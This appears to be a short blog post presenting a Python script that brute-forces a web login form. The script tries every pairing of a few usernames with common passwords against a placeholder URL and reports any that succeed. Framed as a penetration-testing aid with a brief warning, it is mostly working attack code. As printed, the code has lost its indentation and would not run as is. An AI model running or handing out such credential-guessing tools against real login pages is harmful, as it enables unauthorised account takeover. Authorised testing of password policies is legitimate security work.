This tool helps to brute force a web form by trying different combinations of username and passwords. This is particularly useful to security testers to find out bad credentials.
Code Example:
import requests
def brute_force_login(url, usernames, passwords):
for username in usernames:
for password in passwords:
response = requests.post(url, data={'username': username, 'password': password})
if "Login successful" in response.text:
print(f"Found: {username}:{password}")
return
print("No valid credentials found.")
url="http://example.com/login"
usernames=["admin","user","guest"]
passwords=["1234","password","admin123"]
brute_force_login(url,usernames,passwords)
Use Case: This can be the primary objective in penetration testing to get weak logon credentials and show the dismal results of poor password policies.
Tip: Never use this on unauthorized websites.
Top comments (0)